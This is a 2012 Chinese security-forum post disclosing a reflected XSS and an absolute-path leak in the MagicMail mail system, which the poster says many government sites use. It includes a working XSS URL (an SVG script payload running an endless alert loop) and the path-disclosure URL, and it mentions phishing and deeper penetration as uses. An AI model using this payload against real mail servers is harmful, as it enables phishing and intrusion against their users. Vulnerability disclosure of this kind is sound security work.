找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2033|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
9 R. r# V# g7 H: c" X- `4 f" ]) a; E+ M; V' k; ?
: i/ y; @( k8 A. m, ~
包含  一个反射性XSS  以及  绝对路径泄漏6 Z2 u8 s% W$ t1 i3 J( O
看了看 貌似全部是linux的。! U7 T' W6 g5 H) i* O. M0 S& ^$ W6 B
7 \) j  p3 o+ g
关键字:迈捷邮件系统 by MagicMail
- y0 g: \* `; y# k: g; u- c5 X& U+ E, f/ W7 U1 H
可以看到很多政府网站都用这个邮件系统2 b. U' b% y# `( `3 k. I

$ |9 J- Z; o% ?2 G7 v/ a绝对路径 http://madman.in/index.php?login_type=declare&language=  {! P5 s% E1 m/ i5 E9 {$ k
2 ]8 |9 U; d# w/ A( o! ]

& J: c" v4 l2 h8 `7 ]. j( T; c* O7 f4 A. U6 ?  E4 f& u
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
" A) X3 }1 J4 M+ Q
1 Z3 w5 ~: P! o$ B) {; I9 y" }; H

% q8 K/ W  M7 e: T: D) c2 X虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等% p4 Y+ P. g( k: S8 X

! y6 n. `6 K% R7 i修复方案:看官方补丁吧。% d9 ]! f1 c2 w7 ~! d+ {  l: c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表